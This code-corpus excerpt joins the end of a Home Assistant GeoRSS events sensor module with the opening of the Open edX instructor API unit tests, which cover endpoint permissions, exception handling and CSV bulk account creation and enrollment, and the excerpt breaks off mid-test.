DEFAULT_UNIT_OF_MEASUREMENT = 'Events'
DOMAIN = 'geo_rss_events'
SCAN_INTERVAL = timedelta(minutes=5)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_URL): cv.string,
vol.Optional(CONF_LATITUDE): cv.latitude,
vol.Optional(CONF_LONGITUDE): cv.longitude,
vol.Optional(CONF_RADIUS, default=DEFAULT_RADIUS_IN_KM): vol.Coerce(float),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_CATEGORIES, default=[]):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_UNIT_OF_MEASUREMENT,
default=DEFAULT_UNIT_OF_MEASUREMENT): cv.string,
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the GeoRSS component."""
latitude = config.get(CONF_LATITUDE, hass.config.latitude)
longitude = config.get(CONF_LONGITUDE, hass.config.longitude)
url = config.get(CONF_URL)
radius_in_km = config.get(CONF_RADIUS)
name = config.get(CONF_NAME)
categories = config.get(CONF_CATEGORIES)
unit_of_measurement = config.get(CONF_UNIT_OF_MEASUREMENT)
_LOGGER.debug("latitude=%s, longitude=%s, url=%s, radius=%s",
latitude, longitude, url, radius_in_km)
# Create all sensors based on categories.
devices = []
if not categories:
device = GeoRssServiceSensor((latitude, longitude), url,
radius_in_km, None, name,
unit_of_measurement)
devices.append(device)
else:
for category in categories:
device = GeoRssServiceSensor((latitude, longitude), url,
radius_in_km, category, name,
unit_of_measurement)
devices.append(device)
add_entities(devices, True)
class GeoRssServiceSensor(Entity):
"""Representation of a Sensor."""
def __init__(self, coordinates, url, radius, category, service_name,
unit_of_measurement):
"""Initialize the sensor."""
self._category = category
self._service_name = service_name
self._state = None
self._state_attributes = None
self._unit_of_measurement = unit_of_measurement
from georss_client.generic_feed import GenericFeed
self._feed = GenericFeed(coordinates, url, filter_radius=radius,
filter_categories=None if not category
else [category])
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self._service_name,
'Any' if self._category is None
else self._category)
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
@property
def icon(self):
"""Return the default icon to use in the frontend."""
return DEFAULT_ICON
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._state_attributes
def update(self):
"""Update this sensor from the GeoRSS service."""
import georss_client
status, feed_entries = self._feed.update()
if status == georss_client.UPDATE_OK:
_LOGGER.debug("Adding events to sensor %s: %s", self.entity_id,
feed_entries)
self._state = len(feed_entries)
# And now compute the attributes from the filtered events.
matrix = {}
for entry in feed_entries:
matrix[entry.title] = '{:.0f}km'.format(
entry.distance_to_home)
self._state_attributes = matrix
elif status == georss_client.UPDATE_OK_NO_DATA:
_LOGGER.debug("Update successful, but no data received from %s",
self._feed)
# Don't change the state or state attributes.
else:
_LOGGER.warning("Update not successful, no data received from %s",
self._feed)
# If no events were found due to an error then just set state to
# zero.
self._state = 0
self._state_attributes = {}
| apache-2.0 | 2,592,984,052,436,335,000 | 34.913907 | 79 | 0.618108 | false | 4.165131 | true | false | false |
EDUlib/edx-platform | lms/djangoapps/instructor/tests/test_api.py | 1 | 190051 | """
Unit tests for instructor.api methods.
"""
import datetime
import functools
import io
import json
import random
import shutil
import tempfile
from unittest.mock import Mock, NonCallableMock, patch
import ddt
import pytest
import six
from boto.exception import BotoServerError
from django.conf import settings
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.http import HttpRequest, HttpResponse
from django.test import RequestFactory, TestCase
from django.urls import reverse as django_reverse
from django.utils.translation import ugettext as _
from edx_when.api import get_dates_for_course, get_overrides_for_user, set_date_for_block
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import UsageKey
from pytz import UTC
from testfixtures import LogCapture
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.course_modes.tests.factories import CourseModeFactory
from common.djangoapps.student.models import (
ALLOWEDTOENROLL_TO_ENROLLED,
ALLOWEDTOENROLL_TO_UNENROLLED,
ENROLLED_TO_ENROLLED,
ENROLLED_TO_UNENROLLED,
UNENROLLED_TO_ALLOWEDTOENROLL,
UNENROLLED_TO_ENROLLED,
UNENROLLED_TO_UNENROLLED,
CourseEnrollment,
CourseEnrollmentAllowed,
ManualEnrollmentAudit,
NonExistentCourseError,
get_retired_email_by_email,
get_retired_username_by_username
)
from common.djangoapps.student.roles import (
CourseBetaTesterRole,
CourseDataResearcherRole,
CourseFinanceAdminRole,
CourseInstructorRole,
)
from common.djangoapps.student.tests.factories import CourseEnrollmentFactory, UserFactory # lint-amnesty, pylint: disable=unused-import
from lms.djangoapps.bulk_email.models import BulkEmailFlag, CourseEmail, CourseEmailTemplate
from lms.djangoapps.certificates.api import generate_user_certificates
from lms.djangoapps.certificates.models import CertificateStatuses
from lms.djangoapps.certificates.tests.factories import (
GeneratedCertificateFactory
)
from lms.djangoapps.courseware.models import StudentModule
from lms.djangoapps.courseware.tests.factories import (
BetaTesterFactory,
GlobalStaffFactory,
InstructorFactory,
StaffFactory,
)
from lms.djangoapps.courseware.tests.helpers import LoginEnrollmentTestCase
from lms.djangoapps.experiments.testutils import override_experiment_waffle_flag
from lms.djangoapps.instructor.tests.utils import FakeContentTask, FakeEmail, FakeEmailInfo
from lms.djangoapps.instructor.views.api import (
_get_certificate_for_user,
_get_student_from_request_data,
_split_input_list,
common_exceptions_400,
generate_unique_password,
require_finance_admin
)
from lms.djangoapps.instructor_task.api_helper import (
AlreadyRunningError,
QueueConnectionError,
generate_already_running_error_message
)
from lms.djangoapps.program_enrollments.tests.factories import ProgramEnrollmentFactory
from openedx.core.djangoapps.course_date_signals.handlers import extract_dates
from openedx.core.djangoapps.course_groups.cohorts import set_course_cohorted
from openedx.core.djangoapps.django_comment_common.models import FORUM_ROLE_COMMUNITY_TA
from openedx.core.djangoapps.django_comment_common.utils import seed_permissions_roles
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.site_configuration.tests.mixins import SiteMixin
from openedx.core.lib.teams_config import TeamsConfig
from openedx.core.lib.xblock_utils import grade_histogram
from openedx.features.course_experience import RELATIVE_DATES_FLAG
from xmodule.fields import Date
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase, SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from .test_tools import msk_from_problem_urlname
DATE_FIELD = Date()
EXPECTED_CSV_HEADER = (
'"code","redeem_code_url","course_id","company_name","created_by","redeemed_by","invoice_id","purchaser",'
'"customer_reference_number","internal_reference"'
)
# ddt data for test cases involving reports
REPORTS_DATA = (
{
'report_type': 'grade',
'instructor_api_endpoint': 'calculate_grades_csv',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_grades_csv',
'extra_instructor_api_kwargs': {}
},
{
'report_type': 'enrolled learner profile',
'instructor_api_endpoint': 'get_students_features',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_students_features_csv',
'extra_instructor_api_kwargs': {'csv': '/csv'}
},
{
'report_type': 'enrollment',
'instructor_api_endpoint': 'get_students_who_may_enroll',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_may_enroll_csv',
'extra_instructor_api_kwargs': {},
},
{
'report_type': 'proctored exam results',
'instructor_api_endpoint': 'get_proctored_exam_results',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_proctored_exam_results_report',
'extra_instructor_api_kwargs': {},
},
{
'report_type': 'problem responses',
'instructor_api_endpoint': 'get_problem_responses',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_problem_responses_csv',
'extra_instructor_api_kwargs': {},
}
)
INSTRUCTOR_GET_ENDPOINTS = {
'get_anon_ids',
'get_issued_certificates',
}
INSTRUCTOR_POST_ENDPOINTS = {
'add_users_to_cohorts',
'bulk_beta_modify_access',
'calculate_grades_csv',
'change_due_date',
'export_ora2_data',
'export_ora2_submission_files',
'export_ora2_summary',
'get_grading_config',
'get_problem_responses',
'get_proctored_exam_results',
'get_student_enrollment_status',
'get_student_progress_url',
'get_students_features',
'get_students_who_may_enroll',
'list_background_email_tasks',
'list_course_role_members',
'list_email_content',
'list_entrance_exam_instructor_tasks',
'list_forum_members',
'list_instructor_tasks',
'list_report_downloads',
'mark_student_can_skip_entrance_exam',
'modify_access',
'register_and_enroll_students',
'rescore_entrance_exam',
'rescore_problem',
'reset_due_date',
'reset_student_attempts',
'reset_student_attempts_for_entrance_exam',
'show_student_extensions',
'show_unit_extensions',
'send_email',
'students_update_enrollment',
'update_forum_role_membership',
'override_problem_score',
}
def reverse(endpoint, args=None, kwargs=None, is_dashboard_endpoint=True):
"""
Simple wrapper of Django's reverse that first ensures that we have declared
each endpoint under test.
Arguments:
args: The args to be passed through to reverse.
endpoint: The endpoint to be passed through to reverse.
kwargs: The kwargs to be passed through to reverse.
is_dashboard_endpoint: True if this is an instructor dashboard endpoint
that must be declared in the INSTRUCTOR_GET_ENDPOINTS or
INSTRUCTOR_GET_ENDPOINTS sets, or false otherwise.
Returns:
The return of Django's reverse function
"""
is_endpoint_declared = endpoint in INSTRUCTOR_GET_ENDPOINTS or endpoint in INSTRUCTOR_POST_ENDPOINTS
if is_dashboard_endpoint and is_endpoint_declared is False:
# Verify that all endpoints are declared so we can ensure they are
# properly validated elsewhere.
raise ValueError(f"The endpoint {endpoint} must be declared in ENDPOINTS before use.")
return django_reverse(endpoint, args=args, kwargs=kwargs)
@common_exceptions_400
def view_success(request):
"A dummy view for testing that returns a simple HTTP response"
return HttpResponse('success')
@common_exceptions_400
def view_user_doesnotexist(request):
"A dummy view that raises a User.DoesNotExist exception"
raise User.DoesNotExist()
@common_exceptions_400
def view_alreadyrunningerror(request):
"A dummy view that raises an AlreadyRunningError exception"
raise AlreadyRunningError()
@common_exceptions_400
def view_alreadyrunningerror_unicode(request):
"""
A dummy view that raises an AlreadyRunningError exception with unicode message
"""
raise AlreadyRunningError('Text with unicode chárácters')
@common_exceptions_400
def view_queue_connection_error(request):
"""
A dummy view that raises a QueueConnectionError exception.
"""
raise QueueConnectionError()
@ddt.ddt
class TestCommonExceptions400(TestCase):
"""
Testing the common_exceptions_400 decorator.
"""
def setUp(self):
super().setUp()
self.request = Mock(spec=HttpRequest)
self.request.META = {}
def test_happy_path(self):
resp = view_success(self.request)
assert resp.status_code == 200
def test_user_doesnotexist(self):
self.request.is_ajax.return_value = False
resp = view_user_doesnotexist(self.request)
self.assertContains(resp, "User does not exist", status_code=400)
def test_user_doesnotexist_ajax(self):
self.request.is_ajax.return_value = True
resp = view_user_doesnotexist(self.request)
self.assertContains(resp, "User does not exist", status_code=400)
@ddt.data(True, False)
def test_alreadyrunningerror(self, is_ajax):
self.request.is_ajax.return_value = is_ajax
resp = view_alreadyrunningerror(self.request)
self.assertContains(resp, "Requested task is already running", status_code=400)
@ddt.data(True, False)
def test_alreadyrunningerror_with_unicode(self, is_ajax):
self.request.is_ajax.return_value = is_ajax
resp = view_alreadyrunningerror_unicode(self.request)
self.assertContains(
resp,
'Text with unicode chárácters',
status_code=400,
)
@ddt.data(True, False)
def test_queue_connection_error(self, is_ajax):
"""
Tests that QueueConnectionError exception is handled in common_exception_400.
"""
self.request.is_ajax.return_value = is_ajax
resp = view_queue_connection_error(self.request)
self.assertContains(
resp,
'Error occured. Please try again later',
status_code=400,
)
@ddt.ddt
class TestEndpointHttpMethods(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Ensure that users can make GET requests against endpoints that allow GET,
and not against those that don't allow GET.
"""
@classmethod
def setUpClass(cls):
"""
Set up test course.
"""
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
"""
Set up global staff role so authorization will not fail.
"""
super().setUp()
global_user = GlobalStaffFactory()
self.client.login(username=global_user.username, password='test')
@ddt.data(*INSTRUCTOR_POST_ENDPOINTS)
def test_endpoints_reject_get(self, data):
"""
Tests that POST endpoints are rejected with 405 when using GET.
"""
url = reverse(data, kwargs={'course_id': str(self.course.id)})
response = self.client.get(url)
assert response.status_code == 405, \
f'Endpoint {data} returned status code {response.status_code} instead of a 405. It should not allow GET.'
@ddt.data(*INSTRUCTOR_GET_ENDPOINTS)
def test_endpoints_accept_get(self, data):
"""
Tests that GET endpoints are not rejected with 405 when using GET.
"""
url = reverse(data, kwargs={'course_id': str(self.course.id)})
response = self.client.get(url)
assert response.status_code != 405, \
f"Endpoint {data} returned status code 405 where it shouldn't, since it should allow GET."
@patch('lms.djangoapps.bulk_email.models.html_to_text', Mock(return_value='Mocking CourseEmail.text_message', autospec=True)) # lint-amnesty, pylint: disable=line-too-long
class TestInstructorAPIDenyLevels(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Ensure that users cannot access endpoints they shouldn't be able to.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
cls.chapter = ItemFactory.create(
parent=cls.course,
category='chapter',
display_name="Chapter",
publish_item=True,
start=datetime.datetime(2018, 3, 10, tzinfo=UTC),
)
cls.sequential = ItemFactory.create(
parent=cls.chapter,
category='sequential',
display_name="Lesson",
publish_item=True,
start=datetime.datetime(2018, 3, 10, tzinfo=UTC),
metadata={'graded': True, 'format': 'Homework'},
)
cls.vertical = ItemFactory.create(
parent=cls.sequential,
category='vertical',
display_name='Subsection',
publish_item=True,
start=datetime.datetime(2018, 3, 10, tzinfo=UTC),
)
cls.problem = ItemFactory.create(
category="problem",
parent=cls.vertical,
display_name="A Problem Block",
weight=1,
publish_item=True,
)
cls.problem_urlname = str(cls.problem.location)
BulkEmailFlag.objects.create(enabled=True, require_course_email_auth=False)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
BulkEmailFlag.objects.all().delete()
def setUp(self):
super().setUp()
self.user = UserFactory.create()
CourseEnrollment.enroll(self.user, self.course.id)
_module = StudentModule.objects.create(
student=self.user,
course_id=self.course.id,
module_state_key=self.problem.location,
state=json.dumps({'attempts': 10}),
)
# Endpoints that only Staff or Instructors can access
self.staff_level_endpoints = [
('students_update_enrollment',
{'identifiers': 'foo@example.org', 'action': 'enroll'}),
('get_grading_config', {}),
('get_students_features', {}),
('get_student_progress_url', {'unique_student_identifier': self.user.username}),
('update_forum_role_membership',
{'unique_student_identifier': self.user.email, 'rolename': 'Moderator', 'action': 'allow'}),
('list_forum_members', {'rolename': FORUM_ROLE_COMMUNITY_TA}),
('send_email', {'send_to': '["staff"]', 'subject': 'test', 'message': 'asdf'}),
('list_instructor_tasks', {}),
('list_background_email_tasks', {}),
('list_report_downloads', {}),
('calculate_grades_csv', {}),
('get_students_features', {}),
('get_students_who_may_enroll', {}),
('get_proctored_exam_results', {}),
('get_problem_responses', {}),
('export_ora2_data', {}),
('export_ora2_submission_files', {}),
('export_ora2_summary', {}),
('rescore_problem',
{'problem_to_reset': self.problem_urlname, 'unique_student_identifier': self.user.email}),
('override_problem_score',
{'problem_to_reset': self.problem_urlname, 'unique_student_identifier': self.user.email, 'score': 0}),
('reset_student_attempts',
{'problem_to_reset': self.problem_urlname, 'unique_student_identifier': self.user.email}),
(
'reset_student_attempts',
{
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.user.email,
'delete_module': True
}
),
]
# Endpoints that only Instructors can access
self.instructor_level_endpoints = [
('bulk_beta_modify_access', {'identifiers': 'foo@example.org', 'action': 'add'}),
('modify_access', {'unique_student_identifier': self.user.email, 'rolename': 'beta', 'action': 'allow'}),
('list_course_role_members', {'rolename': 'beta'}),
('rescore_problem', {'problem_to_reset': self.problem_urlname, 'all_students': True}),
('reset_student_attempts', {'problem_to_reset': self.problem_urlname, 'all_students': True}),
]
def _access_endpoint(self, endpoint, args, status_code, msg):
"""
Asserts that accessing the given `endpoint` gets a response of `status_code`.
endpoint: string, endpoint for instructor dash API
args: dict, kwargs for `reverse` call
status_code: expected HTTP status code response
msg: message to display if assertion fails.
"""
url = reverse(endpoint, kwargs={'course_id': str(self.course.id)})
if endpoint in INSTRUCTOR_GET_ENDPOINTS:
response = self.client.get(url, args)
else:
response = self.client.post(url, args)
assert response.status_code == status_code, msg
def test_student_level(self):
"""
Ensure that an enrolled student can't access staff or instructor endpoints.
"""
self.client.login(username=self.user.username, password='test')
for endpoint, args in self.staff_level_endpoints:
self._access_endpoint(
endpoint,
args,
403,
"Student should not be allowed to access endpoint " + endpoint
)
for endpoint, args in self.instructor_level_endpoints:
self._access_endpoint(
endpoint,
args,
403,
"Student should not be allowed to access endpoint " + endpoint
)
def _access_problem_responses_endpoint(self, msg):
"""
Access endpoint for problem responses report, ensuring that
UsageKey.from_string returns a problem key that the endpoint
can work with.
msg: message to display if assertion fails.
"""
mock_problem_key = NonCallableMock(return_value='')
mock_problem_key.course_key = self.course.id
with patch.object(UsageKey, 'from_string') as patched_method:
patched_method.return_value = mock_problem_key
self._access_endpoint('get_problem_responses', {}, 200, msg)
def test_staff_level(self):
"""
Ensure that a staff member can't access instructor endpoints.
"""
staff_member = StaffFactory(course_key=self.course.id)
CourseEnrollment.enroll(staff_member, self.course.id)
CourseFinanceAdminRole(self.course.id).add_users(staff_member)
CourseDataResearcherRole(self.course.id).add_users(staff_member)
self.client.login(username=staff_member.username, password='test')
# Try to promote to forums admin - not working
# update_forum_role(self.course.id, staff_member, FORUM_ROLE_ADMINISTRATOR, 'allow')
for endpoint, args in self.staff_level_endpoints:
expected_status = 200
# TODO: make these work
if endpoint in ['update_forum_role_membership', 'list_forum_members']:
continue
elif endpoint == 'get_problem_responses':
self._access_problem_responses_endpoint(
"Staff member should be allowed to access endpoint " + endpoint
)
continue
self._access_endpoint(
endpoint,
args,
expected_status,
"Staff member should be allowed to access endpoint " + endpoint
)
for endpoint, args in self.instructor_level_endpoints:
self._access_endpoint(
endpoint,
args,
403,
"Staff member should not be allowed to access endpoint " + endpoint
)
def test_instructor_level(self):
"""
Ensure that an instructor member can access all endpoints.
"""
inst = InstructorFactory(course_key=self.course.id)
CourseEnrollment.enroll(inst, self.course.id)
CourseFinanceAdminRole(self.course.id).add_users(inst)
CourseDataResearcherRole(self.course.id).add_users(inst)
self.client.login(username=inst.username, password='test')
for endpoint, args in self.staff_level_endpoints:
expected_status = 200
# TODO: make these work
if endpoint in ['update_forum_role_membership']:
continue
elif endpoint == 'get_problem_responses':
self._access_problem_responses_endpoint(
"Instructor should be allowed to access endpoint " + endpoint
)
continue
self._access_endpoint(
endpoint,
args,
expected_status,
"Instructor should be allowed to access endpoint " + endpoint
)
for endpoint, args in self.instructor_level_endpoints:
expected_status = 200
self._access_endpoint(
endpoint,
args,
expected_status,
"Instructor should be allowed to access endpoint " + endpoint
)
@patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': True})
class TestInstructorAPIBulkAccountCreationAndEnrollment(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test Bulk account creation and enrollment from csv file
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
# Create a course with mode 'audit'
cls.audit_course = CourseFactory.create()
CourseModeFactory.create(course_id=cls.audit_course.id, mode_slug=CourseMode.AUDIT)
cls.url = reverse(
'register_and_enroll_students', kwargs={'course_id': str(cls.course.id)}
)
cls.audit_course_url = reverse(
'register_and_enroll_students', kwargs={'course_id': str(cls.audit_course.id)}
)
def setUp(self):
super().setUp()
# Create a course with mode 'honor' and with price
self.white_label_course = CourseFactory.create()
self.white_label_course_mode = CourseModeFactory.create(
course_id=self.white_label_course.id,
mode_slug=CourseMode.HONOR,
min_price=10,
suggested_prices='10',
)
self.white_label_course_url = reverse(
'register_and_enroll_students', kwargs={'course_id': str(self.white_label_course.id)}
)
self.request = RequestFactory().request()
self.instructor = InstructorFactory(course_key=self.course.id)
self.audit_course_instructor = InstructorFactory(course_key=self.audit_course.id)
self.white_label_course_instructor = InstructorFactory(course_key=self.white_label_course.id)
self.client.login(username=self.instructor.username, password='test')
self.not_enrolled_student = UserFactory(
username='NotEnrolledStudent',
email='nonenrolled@test.com',
first_name='NotEnrolled',
last_name='Student'
)
@patch('lms.djangoapps.instructor.views.api.log.info')
def test_account_creation_and_enrollment_with_csv(self, info_log):
"""
Happy path test to create a single new user
"""
csv_content = b"test_student@example.com,test_student_1,tester1,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# test the log for email that's send to new created user.
info_log.assert_called_with('email sent to new created user at %s', 'test_student@example.com')
@patch('lms.djangoapps.instructor.views.api.log.info')
def test_account_creation_and_enrollment_with_csv_with_blank_lines(self, info_log):
"""
Happy path test to create a single new user
"""
csv_content = b"\ntest_student@example.com,test_student_1,tester1,USA\n\n"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# test the log for email that's send to new created user.
info_log.assert_called_with('email sent to new created user at %s', 'test_student@example.com')
@patch('lms.djangoapps.instructor.views.api.log.info')
def test_email_and_username_already_exist(self, info_log):
"""
If the email address and username already exists
and the user is enrolled in the course, do nothing (including no email gets sent out)
"""
csv_content = b"test_student@example.com,test_student_1,tester1,USA\n" \
b"test_student@example.com,test_student_1,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# test the log for email that's send to new created user.
info_log.assert_called_with(
"user already exists with username '%s' and email '%s'",
'test_student_1',
'test_student@example.com'
)
def test_file_upload_type_not_csv(self):
"""
Try uploading some non-CSV file and verify that it is rejected
"""
uploaded_file = SimpleUploadedFile("temp.jpg", io.BytesIO(b"some initial binary data: \x00\x01").read())
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['general_errors']) != 0
assert data['general_errors'][0]['response'] ==\
'Make sure that the file you upload is in CSV format with no extraneous characters or rows.'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_bad_file_upload_type(self):
"""
Try uploading some non-CSV file and verify that it is rejected
"""
uploaded_file = SimpleUploadedFile("temp.csv", io.BytesIO(b"some initial binary data: \x00\x01").read())
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['general_errors']) != 0
assert data['general_errors'][0]['response'] == 'Could not read uploaded file.'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_insufficient_data(self):
"""
Try uploading a CSV file which does not have the exact four columns of data
"""
csv_content = b"test_student@example.com,test_student_1\n"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 1
assert data['general_errors'][0]['response'] ==\
'Data in row #1 must have exactly four columns: email, username, full name, and country'
# lint-amnesty, pylint: disable=line-too-long
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_invalid_email_in_csv(self):
"""
Test failure case of a poorly formatted email field
"""
csv_content = b"test_student.example.com,test_student_1,tester1,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
data = json.loads(response.content.decode('utf-8'))
assert response.status_code == 200
assert len(data['row_errors']) != 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
assert data['row_errors'][0]['response'] == 'Invalid email {0}.'.format('test_student.example.com')
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
@patch('lms.djangoapps.instructor.views.api.log.info')
def test_csv_user_exist_and_not_enrolled(self, info_log):
"""
If the email address and username already exists
and the user is not enrolled in the course, enrolled him/her and iterate to next one.
"""
csv_content = b"nonenrolled@test.com,NotEnrolledStudent,tester1,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
info_log.assert_called_with(
'user %s enrolled in the course %s',
'NotEnrolledStudent',
self.course.id
)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition, UNENROLLED_TO_ENROLLED
def test_user_with_already_existing_email_in_csv(self):
"""
If the email address already exists, but the username is different,
assume it is the correct user and just register the user in the course.
"""
csv_content = b"test_student@example.com,test_student_1,tester1,USA\n" \
b"test_student@example.com,test_student_2,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
warning_message = 'An account with email {email} exists but the provided username {username} ' \
'is different. Enrolling anyway with {email}.'.format(email='test_student@example.com', username='test_student_2') # lint-amnesty, pylint: disable=line-too-long
assert len(data['warnings']) != 0
assert data['warnings'][0]['response'] == warning_message
user = User.objects.get(email='test_student@example.com')
assert CourseEnrollment.is_enrolled(user, self.course.id)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition, UNENROLLED_TO_ENROLLED
def test_user_with_retired_email_in_csv(self):
"""
If the CSV contains email addresses which correspond with users which
have already been retired, confirm that the attempt returns invalid
email errors.
"""
# This email address is re-used to create a retired account and another account.
conflicting_email = 'test_student@example.com'
# prep a retired user
user = UserFactory.create(username='old_test_student', email=conflicting_email)
user.email = get_retired_email_by_email(user.email)
user.username = get_retired_username_by_username(user.username)
user.is_active = False
user.save()
csv_content = "{email},{username},tester,USA".format(email=conflicting_email, username='new_test_student')
uploaded_file = SimpleUploadedFile("temp.csv", six.b(csv_content))
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) != 0
assert data['row_errors'][0]['response'] == f'Invalid email {conflicting_email}.'
assert not User.objects.filter(email=conflicting_email).exists()
def test_user_with_already_existing_username_in_csv(self):
"""
If the username already exists (but not the email),
assume it is a different user and fail to create the new account.
"""
csv_content = b"test_student1@example.com,test_student_1,tester1,USA\n" \
b"test_student2@example.com,test_student_1,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) != 0
assert data['row_errors'][0]['response'] == 'Username {user} already exists.'.format(user='test_student_1')
# lint-amnesty, pylint: disable=line-too-long
def test_csv_file_not_attached(self):
"""
Test when the user does not attach a file
"""
csv_content = b"test_student1@example.com,test_student_1,tester1,USA\n" \
b"test_student2@example.com,test_student_1,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'file_not_found': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['general_errors']) != 0
assert data['general_errors'][0]['response'] == 'File is not attached.'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_raising_exception_in_auto_registration_and_enrollment_case(self):
"""
Test that exceptions are handled well
"""
csv_content = b"test_student1@example.com,test_student_1,tester1,USA\n" \
b"test_student2@example.com,test_student_1,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
with patch('lms.djangoapps.instructor.views.api.create_manual_course_enrollment') as mock:
mock.side_effect = NonExistentCourseError()
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) != 0
assert data['row_errors'][0]['response'] == 'NonExistentCourseError'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_generate_unique_password(self):
"""
generate_unique_password should generate a unique password string that excludes certain characters.
"""
password = generate_unique_password([], 12)
assert len(password) == 12
for letter in password:
assert letter not in 'aAeEiIoOuU1l'
def test_users_created_and_enrolled_successfully_if_others_fail(self):
# prep a retired user
user = UserFactory.create(username='old_test_student_4', email='test_student4@example.com')
user.email = get_retired_email_by_email(user.email)
user.username = get_retired_username_by_username(user.username)
user.is_active = False
user.save()
csv_content = b"test_student1@example.com,test_student_1,tester1,USA\n" \
b"test_student3@example.com,test_student_1,tester3,CA\n" \
b"test_student4@example.com,test_student_4,tester4,USA\n" \
b"test_student2@example.com,test_student_2,tester2,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) != 0
